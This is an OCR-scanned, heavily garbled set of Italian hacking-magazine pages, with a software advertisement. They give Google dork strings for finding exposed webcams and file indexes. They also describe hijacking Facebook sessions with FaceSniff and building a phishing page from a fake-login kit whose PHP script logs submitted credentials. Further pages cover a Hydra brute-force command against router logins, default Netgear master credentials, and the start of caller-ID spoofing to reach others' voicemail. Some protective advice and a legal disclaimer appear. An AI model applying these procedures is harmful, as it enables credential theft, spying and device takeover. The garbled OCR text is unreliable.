ro che rappresenta l'integrità e la possibilità di recuperarlo 
Selezioniamo quello che ci interessa col tasto destro del mou¬ 
se e cicchiamo Save Deleted File per recuperarlo 
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acciaino salti mortali 


Gestione magazzino, fatturazione 
gestione agenti, gestione seriali e 
lotti, e-commerce, fidelity card e 
molto altro ideale per uffici, 
negozi e piccoli supermarket 


a migliore soluzione 


I minor prezzo 


libcr lyCommcrcc 


4 Canone annua le 


Base/Advanced 


E-commerce 


Restaurant 


Le caratteristiche di base: 

• Clienti/Fornitori 

• Multimagazzino 

• Gestione di 8 listini 

• Distinta base 

• Possibilità di creare più aziende 

• Gestione documenti 

• Ordini al cliente e al fornitore 

• Preventivi 

• Interfacciamento con palmare 

• Calendario appuntamenti 


Il piu' facile da realizzare: 

• Grafica personalizzabile 

• Ricerca dei prodotti 

• Fino a 5000 articoli 

• Carrello automatico 

• Una Immagine per prodotto 

• Una copia base di LibertyCommerce 

• Pagamenti : Bonifico/Contrass/Paypal 

• Trasporti definibili 

• Pagina di introduzione al negozio 

• Integrazione con Google 


Advanced + ristorazione 

• Gestione ordinazioni da Palmare 

• Prenotazione dei tavoli 

• Gestione tavoli e comande 

• Gestione dei conti in sospeso 

• Gestione del personale 

• Stampa comande configurabile 
(cucina, bar, pizzeria) 

• Stampa preconto 

• Raccolta comande con palmare 
Windows Mobile 5/6 

• Gestione delle sale 

• Gestione Asporto 

• Gestione Menù 


NEW Crea il tuo “catalogo per agenti” (Visual Agenti) 


www.libertycommerce.it 

Lo scarichi dal sito e lo puoi provare in tutte le sue funzioni per 30 giorni 

Cerchiamo Rivenditori ! Tei.010591926 0104074703 

per le condizioni consultare il sito Prtws fenologici Fax: 010 4206799 


Liberty Line s.r.l. 
wwwJiberty li ne.com 



www. I i berty corri merce, it 















Google: il miglior 
amico delle spie 

Grazie a particolari chiavi di ricerca, possiamo prendere 
il controllo delle webcam altrui e scovare file nascosti 


Cosaci 

occorre 


fAGIi. J 


MOTORE Di RICERCA 

Google 

Lo trovi su ‘'CD 




Sfìo ìfiterrer 

wwwgnoglf’ji 


m 


S pesso senza neanche accor¬ 
gercene lasciamo in Rete, a 
disposizione di tutti, informa¬ 
zioni personali che possono essere 
facilmente scovale dai "segugi" del 
Web: che si tratti di directory colme 
di file multimediali condivisec 
gli utenti della Rete, di immagi 
catturale dalle webcam o addirit¬ 
tura di file contenenti dati riservati 
(come quelli con le proprie pas¬ 
sword), tutte queste informazioni 
risultano raggiungibili con grande 
facilità. Ciò non dovrebbe stupire: 
molti dispositivi comunemente in 
commercio hanno accesso diretto 


Troviamo le vi 


alla Rete e sono dotati di politiche 
di condivisione dei dati trasmessi 
decisamente aperte. Non è poi così 
taro che utenti poco esperti confi 
gurino in modo erroneo applica¬ 
zioni complesse come i Web server, 
utilizzati per la gestione del proprio 
personale, con il risultato di 
iÀ^libero accesso ad intere 
dirt elo' v dell hard disk. 


Ricerche mirate 

dii hacker usano tum strumanto 
semplice e diretto pt rlndivid 
re queste informazioni privai 
questi dati nascosti: il buon vi 


chio Google! Grazie a particolari 
parole chiave chiamate, non a caso, 
Google Hacks, è infatti possibile 
“sguinzagliare" il famoso motore di 
ricerca per ottenere una miriade di 
informazioni normalmente nasco¬ 
ste durante la comune navigazione 
sul Web. Grazie ai Google Hacks (sul 
sito www.hackersforcharity.org/ 
ghdb è presente l’elenco completo 
delle chiavi di ricerca, suddiviso 
per argomento) è quindi possibile 
ricercare un gran numero di in¬ 
formazioni diverse, senza essere 
^sanamente abili e smaliziati 
'formatici! 



Con il semplice utilizzo di un browser e di Google possiamo individuare molte webcam e IPCam che trasmettono 
sul Web le immagini catturate. In alcuni casi è possibile persino spostare la telecamera! 



a II lato oscuro di Google 

■| I Le IPCam sono videocamere di sorveglianza 
-iW twinesse a Internet che, per funzionare, usano 
un Web server interno; alcuni utenti, pero lo lasciano 
“aperto’. Per scovare in Rete queste videocamere col¬ 
leghiamoci all'home page di Google, www google.it. 


Di che marca sei? 

2 1 Per trovare le IPCam e le webcam aperte, è 
~-nJ sufficiente senvere nella barra di ricerca di 
Google alcune particolari siringhe di testo. Per indivi¬ 
duare le videocamere prodotte dalla Axis, ad esempio, 
scriviamo semplicemente inlitle: "Uve View/ - AXIS". 


a Immagini rubate! 

3 i Nel browser comparirà un elenco con irisulta 
ti della ricerca A questo punto baste cliocare 
su uno di questi risultati. Appanrà una finestra con le 
immagini della videocamera alcune volte sara possi¬ 
bile muoverla usando degli appositi pulsanti. 
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| Google: il miglior amico delie spie | investigatore intormatico^j m 


Accesso alle webcam in un clic 


Dal sito Opentopia è possibile controllare le videocamere attive nel mondo, cosi da non dover 
effettuare lunghe ricerche con Google. Ecco come scovarle servendoci di una pratica mappa. 



^ L’indirizzo g iusto 

■| ~ Colleglliamoci a www.operiropja r jr terranno 
mostrate le webcam più viste e quelle pk't rece-m pm- 
senti sul sito. Cicchiamo Map e in Search fora piace irdi 
chiamo la città in cui cercare le webcam (ad esempio SevM 
Da in selezioniamo Spaio e cucchiamo View. 


Un occhio sul mondo 

2 ì Fatto ciò, la mappa verrà aggiornata con la località 
-r:- ■ indicata. A destra comparirà una lista delle immagini 
provenienti dalle videocamere più vicine alla località indicata 
| resta che cliccare su una del ie anteprime per visualiz 
i intempc reale! 

' M — 



4 



TUTTE LE WEBCAM 
CHE VUOI 


Abbiamo visto come 
corcare con le stringhe 
di ricerca di Google 
Hadu le immagini 
provenienti dalie vide¬ 
ocamere Amìs. Perseo 
prire quelle che usano 
il software WebcamXP 
la stringa da inserire 
è intitle:'pmered 
bywebcamXP' 
IntitlerProBroadant" 
Per le videocamere 
che usano l'applica- 
tioneEvocam, invece, 
la stringa corretta 
è intUie-.'lyoCam" 
inurl:"web(am. Irtml". 
Infine, per scovare le 
immagini catturate 
con NetSnap usiamo 
intìtle:“lìve NetSnap 
Cam-Serrerfted". 


BigG trova file nascosti 

Utilizzando il noto motore di ricerca si possono trovare anche file musicali, 
video, eBook e molto altro ancora. Ecco come procedere. 



^ Musica e film senza limiti 

■J ; In www.google it scriviamo -inurl:(htm\htnii 
\pbp\asp\aspx\pl\py\cgi) infitte: “index ot" 
+ "last modified*+ w parentùirector\'" -hdescriptron 
+size +(mp3 \ wmv) ‘artista". Sostituiamo artista 
con il nome dei cantante da cercare. Comparirà un 
elenco dei file trovai. Assicuriamoci che si tratti di 
contenuti sui quali non si applica il dintto d’autore! 



^ Buona lettu ra a tutti 

2 Per cercare filmati, nei parametri di ricerca 
precedenti inseriamo (avi | movfoi posto di 
I mp3 1 wmv). Analogamente, per cercare un eBook 
scriviamo -inur1:(titm \titnil\plip\asp\aspx\pf\py\cg 
i) infitte: “index or + “last modified' + “parent direc¬ 
tory” -hdescription +size +(ptìf \ llt \ rtf \ epub) 
‘ libro sostituendo il titolo dell’eBook a libro 


PIÙ PRIVACY PER TOm 


Ili indiscreti 

d sp afe la nostra vita privata 
~ incalliamo e configuriamo correttamente 
* wi firewall per mantenerlo sempre attivo e 
bloccare accessi non autorizzati al nostro PC. Per 
nostri scopi, possiamo anche utilizzare il firewall 
di Windows. Se abbiamo Windows Vista o 7. digi 
tiamo firewall nel menu Start e cucchiamo su 
Windows Firewall con protezione avanzata. Nel¬ 
la schermata che appare selezioniamo la voce 
Regole di protezione delle connessioni e poi 
Nuova regola Quindi scegliamo di bloccare le 
connessioni dall’esterno. 

Quando non utilizziamo la webcam, ncor- 
diamoci sempre di spegnerla. Un eventua¬ 
le sprone non avrà cosi modo di accedervi e irse¬ 
la peri suoi scopi truffaldini. 

Le cartelle condivise devono essere usate 
per archiviare temporaneamente file e do¬ 
cumenti. Quando non servono più. ricordiamoci 
di cancellarli. 
















































| Fai da te | Facebook sei spiato | 




Cosa ci f 
occorre V"' 

APP PtR ANOROID 

FACESNIFF 

Quanto costi: Gratuito 
Silo Internet 

http://smfulamlioiU.coni 


a 


A rrivare alla scopertadi qualsiasi password 
è ormai quasi un gioco da ragazzi, anche 
perii pirata alle prime armi. Oggi infatti 
sono sufficienti pochi secondi per mettere a 
repentaglio la sicurezza di ogni utente connesso 
a Internet. E per farlo, basta anche uno smart¬ 
phone Andrmd. Grazie ad alcune applicazioni 
sviluppate per questa piattaforma, come ad 
esempio FaceSniff, il pirata 6 in grado diloggarsi 
con identità altruisu Facebook come se avesse 
i veri usemame e password. Usare Facesniff è 
semplice e ciò deve far riflettere sulla poca si- 
curezza applicata dagli stessi forn icori di servizi 
on-line. Basterebbe, infatti, evitare di rilasciare 
cookie per garantire quella poca privacy i n più 
spesso essenziale a tutti gli ignari internauti. 

Accessi non autorizzati 

Un'altra tecnica utilizzata pei rubare idatiper 
sonali altrui prende ilnome diSessionhijacking 
e consiste nel dirottare i cookie rilasciati dai siti 
verso altri indirizzi IP della stessa rete, consen¬ 
tendo un’autenticazione multipla. Ciò avviene 
in ogni rete Wi-Fi, sia essa libera o crittografota 
da password di tipo WPA2. In poche parole, 
il pirata fa in modo che un utente connesso a 
Internet e che cerca di raggiungere un sito Web 
(ad esempio Facebook) in realtà ne visualizzi un 
altro, identico all’ariginale ina realizzato dal 
pirata stesso. Quando nome utente e password 
vengono inseriti, il gioco è fatto: tramile e-mail 
o via FTP, il pirata riceve i caratteri digitati! Più 
semplicemente, però, un eventuale malinten 
zionato può adottare la pratica del social engi 
neeringe inviare una serie di e-mail cercando di 
convincere chi legge a cliccare sul link riportato, 
facendogli credere di trovarsi all'interno del 
vero sito Web, mentre in realtà si tratta d i quello 
fasullo. Analizziamo, quindi, quali sono i passi 
che compie il pirata per creare la finta botile 
page di un sito come Facebook e raccogliere 
1 dati personali di tutte le sue ignare vittime, 


Facebook 
sei spiato 

Un semplice smanettone può 
bucare il tuo profilo. Ti facciamo 
vedere quanto è facile 







Facebook sei spiato ] Fai da te 



13 Attacco al social network 

Basta una semplice applicazione Androidi per entrare negli account degli altri utenti. L’attacco avviene sfruttando 
una rete Wi-Fi ed è piu semplice di quanto si possa pensare! Diamo uno sguardo alla procedura. 


Impostazioni privacy 


Cancella cache 

Cancella i contenuti e i database 
memorizzati localmente nella caci- 


Cancella cronologia 

Cancella la cronologia di esplorazic 
del browser 


^ P ulizia nel browser 

■J ? Se il pirata accede al propri aScG^int 
■ Facebook anche dal telefonino, «tvvir 
il browser integralo nel suo smartpho^X 
Android e si sposta nel menu Impostazioni 
Da qui, ripulisce la Cronologia di navigazione 
Cancella i cookie e arche tutti i dati memo¬ 
rizzati in cache 





Unknown 

id:1630644354 

Unknown 

id:1613463422 


* FaceSniff in azione 

2 f Il pirata si sposta ora sul PC e cerca 
- : sul Web il pacchetto FaceNtft-19.4- 
fìipper-Release.apk. Lo trasferisce sullo 
smartphone e procede alla sua installazio¬ 
ne A nnesta punto, si connette ad una rete 
Wi-Fi efr avvia Facui^ifhper lappare poi sul 
grande pulsar re. passa. 

- *$/j 


* Obiettiv o raggiunto 

3 | La ricerca di una potenziale vittima 
—-F ha inizio: se qualche altro utente con¬ 
nesso alla stessa rete senza fili è connesso 
a Facebook apparirà nella lista dopo soli 
pochi secondi. Al pirata basta tappare su 
uno dei nomi visualizzati per loggarsi con i 
dati dell'ignaro utente. 


ni Un clone davvero perfetto 

Ecco come il pirata informatico crea una home page fasulla di Facebook e, sfruttando tecniche di ingegneria 
sociale, riesce a raccogliere i dati personali di accesso al social network delle sue prede! 


Scarica il Fakelogin-Facebook 

'a ovvtaraoet», da quanto avroto capite. ? tulio GRATIS! 
cri pc© che quei li tnrwilonn pur r.rnipntn» cavi gnule <id un pi**s 






ep-»rr 

*afcM*fin-«°ucrtmik-MsmcAlLCOM.tlp 

en»«UC Ar (*iy\c 

dm tti{k^wHn*.nn«icaru«av 

Ck< wm derr f«;« «iWa» im quita filar 

• tetta flU 

Dd ftf»I©creatiaaiara©rfturtirilRCtqcpUotl|i«. 

l & 

^ Tu tto il necessario 

■| |ll pirata informatico si collega alla 
W* pagina http://google/LQM20 ed effet¬ 
tua il download di una falsa bome page di 
Facebook già pronta all'uso. Al termine del 
download estrae il contenuto dell’archivio 
compresso in formato ZIP sul Desktop del 
suo computer. 


* .^Apri . ^ Salva 

Ww Annulla 

:'! “poit.php X 


'?0IP 

Autaie : Pasquale Scarpati di « www.asnscan.co 

Script : Fakelcqin Facebook 


header ( location tutp://jt 

•v 

tt. facebook. con/ >; 

Sfiandle » topenC dati txf. 

‘a“)[ 

foreacM . POST »s Svariatile 
!fwriter$ti-jtdle. ^variatile); 
rwrjie($hnntnp, 
fwritelihaudio, ivalue); 
rwrltetjhairflle, *\r\n"l; 

s> St'rtlwc) { 


facebook 


Facebook ti aiuta a connetterti e rimanere in 
contatto con le persone della tua vita. 


X 

M 


X A 
X 


X 




^ Tutto in un file 

2 II pirata accede alla directory nei- 

. 1 la quale ha scomqattato I archivio e 

apre il file post.ptip con un editor di testo 
non formattato (ad esempio Blocco Mote per 
assegnare un nome ai file nel quale verran 
no memorizzati i dati delle vittime (nel caso 
in figura dati.Cri). 


Home page fasulla 

3 Al pirata non resta quindi che carica- 
re i tre file scompattati nel suo spazio 
Web (ad esempio uno gratuito con Altervista) e 
inviare un’e-mail con il link da raggiungere: la 
pagina visualizzata, però, non è quella vera di 
Facebook, quindi occhio all'indirizzo mostrato 
nel browser 1 


Cnnrinll M/ir-, fi .Innminr. OC 



















































V Investigatore informatico 


| Pericolo ONS dinamico 


Così entri in 
qualsiasi computer 

Ecco la tecnica usata dai pirati per intercettare le connessioni di 
Rete. E così accedere a qualunque PC diventa un gioco da ragazzi 


L a nostra storia ha inizio col "DNS 
dinamico ", o “dynamie D1MS"', nome 
tanto caro ai professionisti della Rete 
e che sottende la tecnica grazie alla quale 
è possibile associare un normale dominio 
Internet ad un indirizzo IP, come quel¬ 
lo della nostra linea ADSL. Gnjztefc^n 
DNS dinamico, ottenibile gratuitamente 
rivolgendosi a servizi on-line (leggi hrtjr 
in basso), è possibile fruire di tutti i vari 
taggi di possedere un IP statico pur non 
avendolo (quello assegnatoci dai provider 
generalmente è dinamico, ossia cambia 
ad ogni connessione). Ed è cosi che, con 
enorme comodità, possiamo visualizzare 
i file memorizzati nel nostro NAS o ma¬ 
gari dare una rapida occhiata alle impo¬ 
stazioni del nostro router anche quando 
siamo in ufficio o durante un viaggio. 11 
tutto semplicementeTicordando il no 
me di un dominio Internet (ad esempio 
http://tuonome.nomeservizio.org): sarà il 
servizio di DNS dinamico a occuparsi di 
tradurlo nell’indirizzo IP effettivo asse 


gnatoci dal provider per quell'istanza di 
connessione. Tutta la flessibilità di questa 
soluzione ha il suo scotto da pagare! Dob¬ 
biamo stare molto attenti: anche in questo 
caso, il pirata è sempre pronto a sferrare 
i suoi attacchi e violare la nostra privacy. 

Cosa può fare il pirata? 

Quando c'è di mezzo una password o la 
possibilità di entrare in possesso di dari 
altri)!, ispirata cercali escogitare qual 
che nuovo sistema per raggiungere il suo 
obiettivo. Come abbiamo scoperto, un 
DNS dinamico pu ò'és.sire Intesa come 
un vero e proprio do in Itilo Interri^ (al 
pari di un classico sito Web) al quale vie¬ 
ne associato l'indirizzo IP di un romei, 
un NAS n qualsiasi altro dispositivo™# 
grado di connettersi in Rete. Dopo aver 
settato correttamente ogni parametro è 
dunque possibile accedere al pannello 
di amministrazione della periferica in 
esame modificandone le impostazioni o 
visualizzandone i file in essa contenuti 


u, nel caso di un rourer, visualizzando 
la password della nostra rete senza fili: 
è proprio qui che entra in azione il pi¬ 
rata! Utilizzando particolari strumenti 
di analisi è in grado di forzare la chiave 
di accesso che serve a gli impedirgli di 
prendere pieno possesso del dispositivo da 
noi configurato. Non importa che si tratti 
di un preciso modello di router o di una 
IP Cam, qualsiasi interfaccia di gestione 
puh essere violata e la semplicità con cui 
riesce a terminate la sua opera ci lascerà 
realmente senza parole. 

L’attacco è bruteforce! 

Come nella maggior parte dei casi, anche 
questa volta il pirata fa affidamento ad 
una distribuzione Linuxnella quale sono 
Integrali numerosi tool di analisi di rete 
generalmente utilizzati dai professioni¬ 
sti per testare la sicurezza della propria 
LAN. Stiamo parlando di BackTrack, or 
mai giunta alla sua quinta versione e da 
sempre amata dai pirati di tutto il mon- 


POSSIAMO FIDARCI DEI SERVIZI CHE 
OFFRONO UN DNS DINAMICO GRATUITO? 


Fra i servizi che offrono un 
dominio DNS dinamico in 
maniera del tutto gratuita, 
DynDNS (www.dyndns.it) e 
No-IP (www.no-ip.com) serri 
brano essere quelli preferiti 
dagli utenti di tutto il mon¬ 
do. Ogni dominio registrato 
prevede un nome utente e 
una password associati all'ac- 
count creato. Accedendo poi 
al pannello di amministra¬ 
zione del òom imo possiamo 
impostare tutti i parametri 
della nostra linea locale in 


modo da renderla disponi 
bile anche sul Web. Ma questi 
due servizi sono sicuri? Per il 
pirata riuscire ad ostacolare 
la protezione presente sui siti 
Web dei due provider non è 
cosa semplice poiché il grado 
di sicurezza dei server, per 
ovvie ragioni, è molto alto. 
Uno fra i metodi che può 
adottare per appropriarsi 
anche di questi dati è instal¬ 
lare un keylogger sul nostro 
PC, registrando dunque 
tutti i caratteri digitati. In 


ogni caso, se proprio desidera 
entrare in possesso anche di 
questa nostra password potrà 
raggiungere il suo obiettivo 
dopo aver violato le prote 
zioni del l'interfaccia Web del 
nostro router; raggiungendo 
infatti il giusto menu potrà vi¬ 
sualizzare il nome utente e la 
password necessari allacces 
so a! dominio DNS dinamico, 
proprio perché, affinchè tutto 
funzioni, tali dati devono es¬ 
sere necessariamente inseriti 
anche sul nostro router. 
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Pericolo DNS dinamico 



A COSA SERVE IL DDNS 

Configurando un DNS Dinamico è possibile accedere alle periferiche di casa collegate 
A al nostro router (NAS, IP Cam, decoder satellitari Linux ecc.) anche quando siamo 
in ufficio o in qualsiasi altro angolo di mondo. Basta disporre di un PC/smartphone 

e inserire il nostro indirizzo DDNS personale 


do. Al pirata basterà scaricarla da] sito 
Web ufficiale, masterizzarla su un DVD 
(o creare una chiavetta USB avviabile) per 
accedere subito al sistema senza neanche 
installarlo. Poiché ogni dispositivo ha una 
sua interfaccia Web ben diversa dalle altre, 
l’unico strumento universalmente valido 
che il pirata può usare è provare con un 
attacco di tipo “bruteforce". Di cosa si 
tratta? In poche parole, il software non 
farà altro che tentare l'inserimento 
di numerose password di accesso 
fino a trovare quella corretta. Appare 
evidente dunque che affinchè l'ope¬ 
ra del pirata possa avere una buona 
percentuale di riuscita è estrema- 
mente importante per lui munirsi 
di un dizionario contenente un alto 
numero di parole o combinazioni 
casuali di lettere. Da dove prelevar¬ 
lo? Nel caso in cui il pirata sospetti 
che la password in esame non sia poi 
così difficile potrà sfruttare quello 
già integrato in BackTrack. Nel ca¬ 
so in cui la chiav r e si dimostri più ardua 
del solito gli basterà fare un salto sulla 
Rete por prelevare decine di differenti 
dizionari molto ben nutriti (basti pensare 
che alcuni di questi possono raggiungere 
anche dimensioni di 5 GB!). Già da ora è 
possibile intuire che per mettere i bastoni 


fra le ruote al pirata^ ie i uole invadere la 
nostra privacy ci basterà peBsAre ad una 
password molto complessa ed fi piò lunga 
possibile: maggiore sarà la sua difficolta, 
minore sarà la probabilità che il dizionari 
da lui utilizzato sia in grado di scovarla. 

Hydra: il tool deirhacker 

Lo strumento software contenuto in Bar 
klrack che il pirata utilizza per sferrare 


Anche se dotate di login 
protetto da passwordle 
periferiche di rete possono 
essere attaccate con dati 
d'accesso di de fault previsti 
dal produttore 


fronte a problematiche legate ali’utilizzo 
di un software e dal dover digitare qualche 
remando testuale da Terminale. liceo per- 
^prcferisce la versione Linux de! tool II 
mio scoglio che dovrà superare prima 
usegu i re l’attacco bruteforce con Hydra, 
è l’e^htualità di specificare un utente 
per accedere alla risorsa di Bete remota 
che prevede un login Anche in questo 
caso il pirata non si dispera: la stragran 
de maggioranza delle periferiche in 
circolazione (router, NAS, IP Cam;..), 
pur offrendo la possibilità di creare 
nuovi utenti autorizzati all’accesso al 
pannello di ammi n istra zione, preve 
de "adtnin" come username princi¬ 
pale. E se l'interfaccia Web del nostro 
dispositivo è provvista del sistema di 
protezione SSL? Ai pirata basta ag¬ 
giungere alla stringa digitata (Passo 
5) il parametro -S pe r superare age 
volmente anche questo ostacolo. Le 
potenzialità di Hydra sono ormai più 
che evidenti! 


il suo attacco bruteforce è Hydra. Questo 
tool da qualche anno è disponibile anche 
su piattaforma Windows ma norr-ne ha 
ereditato tutta la potenzialità ed i parame¬ 
tri aggiuntivi presenti nella sua versione 
Linux. Un pirata che si rispetti, però, non 
è per nulla preoccupato di ritrovarsi di 


Non solo forza bruta 

La durata dell'attacco bruteforce è for- 
’temente legara alla complessità della 
password da trovare. Ma in alcuni casi al 
pirata bastano davvero pochi secondi per 
raggiungere il suo obiettivo. La prima e 


► 
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C Investigatore informatico 


Pericolo DNS dinamico 



DNS 


Acronimo di Domain 
Nome System e il 
meccanismo secondo il 
quale viene associato 
un nomea dominio (.it, 
com, .net, ecc..) ad un 
indirizzo IP fìsico. 

SSL 

E un protocollo Internet 
secondo il quale tutti 
i dati che viaggiano 
in Rete vengono au¬ 
tografati in modo da 
non essere identificati 
dal pirata che cerca di 
appropriarsene. 

BRUTEFORCE 

Tipo di attacco informa¬ 
tico che prevedere l'uti¬ 
lizzo di un dizionario. 
Viene tentato l'inseri¬ 
mento di tutte le parole 
presenti nel dizionario 
(solitamente un file 
di testo fino a scovare 
quella corretta. 

WLANO 

Nel mondo Linux con 
questo termine si in¬ 
dica l'interfaccia Wi-Fi 
integrata nel P<. La 
scheda di rete Ethernet 
integrata è invece chia¬ 
mata ethO. 


fondamentale fase della sua opera, 
infatti, è sempre l’osservqzione: 
raggiungendo il nome del dominio 
DNS dinamico potrà subito venite 
a conoscenza del produttore e del 
modello del prodotto a cui vuole 
accedere. Il pirata che non è pro¬ 
priamente alle prime armi sa he 
nissimo che esistono delle vulne¬ 
rabilità note per alcuni dei dispo¬ 
sitivi più diffusi, come ad esempio 
il router NetgeaT WG602: con una 
rapida ricerca sul Web si 
scopre infatti che esiste 
una password di ammi¬ 
nistrazione standard 
(detta master password) 
utilizzata dai tecnici per 
accedere facilmente alle 
principali impostazioni 
del router. Tale scoperta 
non dovrebbe poi lasciar¬ 
ci senza nÉroje conside 
rato che aj^jf;|k»il BIOS 
del nostro computer 
per molti altri disposi 
vi esiste un passepart 
che potrebbe essere utiliz 
pirata per altri scopi ben più pei% 
colosi. Nel caso del router Netgear 
sopraccitato, il nome utente e la 
password di accesso universali 
pare siano rispettivamente "Ge- 
arguy” e "Geardog’': se siamo in 
possesso di questo modello di ro¬ 
uter non ci resta che provarne la 
vulnerabilità ed eventualmente 


correre ai ripari installando un 
aggiornamento del firmware o 
contattando direttamente il pi o 
duttore per cercare di trovare una 
soluzione al problema. 

Alcune regole 
per proteggersi 

È ora evidente che il vero pericolo 
non è il DNS dinamico in quanto 
tale, ma l'interfaccia di gestione dei 
nostri dispositivi. E, poiché almeno 


a 

Evitiamo di diffondere il 
nostro indirizzo DNS dinamico. 
Un pirata potrebbe usarlo 
per accedere all'interfaccia 
del nostro router e a tutte le 
periferiche collegate 



alrnomento non è proprio possibile 
trovareflbna soluzione definitiva 
agli attacchi di tipo bruteforce, non 
ci resra ohe limitare decisamente al 
minimo l’utilizzo defservizi DNS 
dinamici. Cerchiamo quindmii 
evitare di configurare tutti i Bi¬ 
spositivi installati nella nd§t|a rete 
domestica e limitiamoci a settate 
esclusivamente quelli che ritenia 


e ni 
i re 


mo realmente indispensabili an¬ 
che quando siamo lontani da casa. 
Per questi cerchiamo di scegliere 
parole chiave molto lunghe (anche 
se la maggior parte delle volte non 
è assolutamente possibile inserire 
più di 8 caratteri). Su quei dispo¬ 
sitivi che lo consentono (come ad 
esempio i decoder satellitari basati 
su sistema operativo Linux come il 
Dreambox) rinunciamo all'inter¬ 
faccia Web per fare spazio ad una 
connessione di tipo SSH, 
ben più difficile da vio 
lare anche per un pirata, 
li prestiamo pure molta 
attenzione a ciò che in¬ 
quadrano le IP Cam in 
stallale all'interno delle 
nostre case: se il pirata 
riesce ad accedere all'in¬ 
terfaccia di gestione del 
router, è per Itti un gioco 
da ragazzi scoprire infatti 
tutte le altre periferiche 
ad esso connesse, anche 
se su di esse non è stato 
configurato alcun servizio per la 
visione all’esterno della rete. Per 
assicurarci un minimo di prote¬ 
zione in piti evitiamo quindi di 
diffondere il nostro dominio DNS 
dinamico: se nessuno verrà a cono 
scenza della sua esistenza difficil- 
ente qualche pirata sarà curioso 
scoprire cosa si cela nella nostra 
ete locale! 


// 


LE PASSWORD STANDARD VANNO ASSOLUTAMENTE CAMBIATE! 


A volte, per negligenza o per altro, dimenti 
chiamo di impostare una chiave personalizzata 
all'interfaccia Web dd dispositivi che abbiamo 
instai lato nella nostra rete domestica. Alcuni d i 
questi permettono l'accesso alle impostazioni in 
maniera diretta, per altri è invece necessario in¬ 
serire la password standard settata direttamente 
dal produttore. Se ciò ci fa pensare di essere 
comunque al sicuro siamo completamente fuori 
strada. In Rete esistono infatti numerosi siti 
grazie ai qua li è possibile scoprire le cosiddette 
master password (o default password) di qual¬ 
siasi dispositivo attualmente in circolazione. 
Fra questi segnaliamo ad esempio www.de- 
faultpassword.com: dopo aver raggiunto la 
home page del sito, al pirata basta inserire il 
nome del produttore e del relativo modello 
(solitamente visualizzati nella pagina princi¬ 
pale dell'interfaccia Web del dispositivo sotto 
attacco) per scoprire quali dati deve inserire! Il 
nostro consiglio è dunque quello di provvedere 


all'inserimento di una chiave personalizzata potremo rendere più difficile la vita al pirata 
abbastanza lunga e preferibilmente contenen- che molto probabilmente non sarà in grado di 
te combinazioni di lettere e numeri. Solo così raggiungere il suo obiettivo. 
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Non c’è login che tenga 

Per il pirata che conosce rindirìzzo di un DNS dinamico, scoprire le password è un gioco da 
ragazzi. Ecco come scova la chiave di accesso alle impostazioni del nostro router! 



▲ Masterizza DV D degli hacker 

1 Per iniziare la sua opera il pirata ha bisogno della distri - 
' r buzione Linux BackTrack raggiunge quindi il sito Web 
www.backtrack-linux org e si sposta lèll&sezione Download 
per scaricare l'ultima release disponibile Al tófmine masterizza 
su un DVD vernine il file .iso scaricato. 

_ 
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*?«; h^rk ! trark 1?. 

Prrv; L'Ipbl tacxhl rxjrticns 


Av vio dall’unità ottica 

2 : Quando il processo sarà terminato, il pirata riavvia il 
PC ed accede al BIOS per impostare il boot da DVD 
Quest'operazione vana in base al tipo di scheda madre in uso 
Inserisce poi nel lettore il disco di BackTrack masterizzato in pre¬ 
cedenza e ne attende il caricamento. 




ANCHE IN LAN 

Il software Hydra, 
integrato ir BackTrack 
e utile al pirata anche 
per scovare le password 
di dispositivi locali. 

Nel caso in cui abbia 
accesso alla nostra rete 
senza Mi gli basterà 
digitare nel terminale 
il comando 'dhdient 
wlantTper scoprire 
IIP del router. Gli sarà 
sufficiente, dunque, 
inserirlo nella strìnga 
analizzata al Passo 5 
(al posto dell’indirizzo 
del DNS dinamico) per 
raggiungere il suo 
obiettivo. 


^ La giusta modalità 

3 I Utilizzando le frecce direzionali della tastiera il pirata 
-. - ! seleziona l’opzione BackTrack Text - Default Boot Text 
Mode e conferma con Invio. Con questa modalità potrà accedere 
alle periferiche installate sul PC, prima tra tutte la scheda di rete, 
fondamentale per il raggiungimento del suo scopo. 


L’interfaccia grafica 

4 Dopo solo qualche secondo appare un'interfaccia testua- 
w le. Per utilizzare un ambiente grafico più intuitivo e meno 
ostico il pirata digita startxe conferma con Invio Attende quindi 
il caricamento del desktop di BackTrack 5. Da qui clicca sul Ileo 
na Terminale presente nella barra superiore. 



a, li pirata in azione 

g A questo punto l'hacker entra ne! vivo dell operazione: 
digita il comando hydra -l admm -P/pentesVpassword&' 
wordlisf/darkcOde.Ist -ens-f-VINDIRIZZO DA ATTACCARE 
http-get/e conferma con Invio per iniziare l'attacco bruteforce 
sulla pagina di login del router bersaglio. 


^ Obiett ivo raggiunto! 

g L’operazione può durdre da qualche minuto a diverse ore 
Tutto dipende dalla lunghezza e "dalla difficoltà della pas¬ 
sword impestata come login al router o a qualsiasi altro dispo¬ 
sitivo attaccato. In caso di esito positivo apparirà a schermo un 
messaggio di conferma seguito dalla chiave di accesso, 
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Disguise Your Mumber 


I mmagina di estrarre il tuo tele 
fune dalla tasca dei pantaloni, 
di comporre un numero e di 
poter ascoltare in pochi istanti la 
segreteria telefonica di qualsiasi 
persona desideri. Attento, perchè 
tion si tratta di un film degno di Ja¬ 
mes Borni, ma della realtà. Questo 
è quello che un malintenzionato 
riesce a mettere in pratica per spia¬ 
re le conversazioni altrui. Grazie a 
un piccolo escamotage, infatti, è 
possibile ascoltare i messaggi la¬ 
sciati all'Interno delle segreterie 
telefoniche di (fh disiasi persona che 
abbia il serv izio abilitato sulpi opnjn 
numero di cellulare. 

Colpa dello spoofing 

In tecnica che andremo ad analiz¬ 
zare èquella dell'ID spoofing telefo¬ 
nico. In sostanza, si tratta di andare 
a modificare il proprio numero di 
telefono con uno scelto a piacere 


(in questo particolare caso con il 
numero della persona di cui si vo¬ 
gliono ascoltare i messaggi in segre¬ 
teria), facendo credere ai gestore di 
Telefonia mobile di essereun utente 
invece di un altro per accedere alla 
casella telefonica di quest'ultimo. 
Abbiamo verificato che il trucco 
adottato dai pirati funziona con i 
pri ncipali operatoli d i telefon ia mo¬ 
bile, ad eccezione della Vodafone. 

Vietato dalla legge! 

Ovviamente la procedura riportata, 
qualora venissq messa in pratica 
per ascoltare le conversazioni senza 
le dovute autorizzazioni, verrebbe 
considerata a tutti gli effetti come 
violazione della privacy. L'articolo 
non vuole in nessun modo incitare 
allo svolgimento delle operazioni 
qui descritte ma ha come finalità 
lo studio pei analisi personale e 
privata. 


Iscrizione a SpoofCard 

Prima d tutto il malintenzionato si iscrive al sito SpoofCard.com per poter 
I modificare il proprio numero di telefono che appare sul display della perso¬ 
